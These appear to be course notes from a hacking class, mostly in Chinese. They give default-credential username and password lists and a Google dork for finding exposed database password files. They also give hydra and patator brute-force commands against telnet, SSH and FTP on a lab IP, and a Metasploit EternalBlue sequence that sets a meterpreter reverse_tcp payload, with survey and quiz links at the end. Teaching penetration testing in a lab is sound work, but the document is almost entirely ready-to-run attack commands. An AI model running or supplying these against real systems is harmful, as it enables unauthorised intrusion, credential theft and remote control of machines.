---
# System prepended metadata

title: Untitled

---

【Threat map】
https://threatmap.checkpoint.com/

【user.txt】
root
guest
klog
msfadmin
postgres
sys
service
user
1337
pablo
smithy
admin
administrator

【passlist.txt】
123456789
admin
msfadmin
batman
starwar
service
user
myadmin
password
passwd
postgres
guest
letmein
charley

【GHDB搜尋資料庫連線設定檔】
intext:DB_PASSWORD || intext:”MysQL hostname” ext:txt

【暴力破密】
**telnet破密：** hydra –L user.txt –P passlist.txt –t 2 telnet://10.10.0.20
**ssh破密：** patator ssh_login host=10.10.0.20 user=FILE0 password=FILE1 0=user.txt 1=passlist.txt –x ignore:mesg=’Authentication failed.’
**ftp破密：** hydra –L user.txt –P passlist.txt –t 4 ftp://10.10.0.20

【Metasploit MS17-010】
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 10.10.0.30
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <本機IP>
show options
run

[課後問卷]
https://forms.gle/ikq49HBrgyFLPGNK9

[課後測驗]
https://forms.gle/sbLeoiycZ6n2e6M68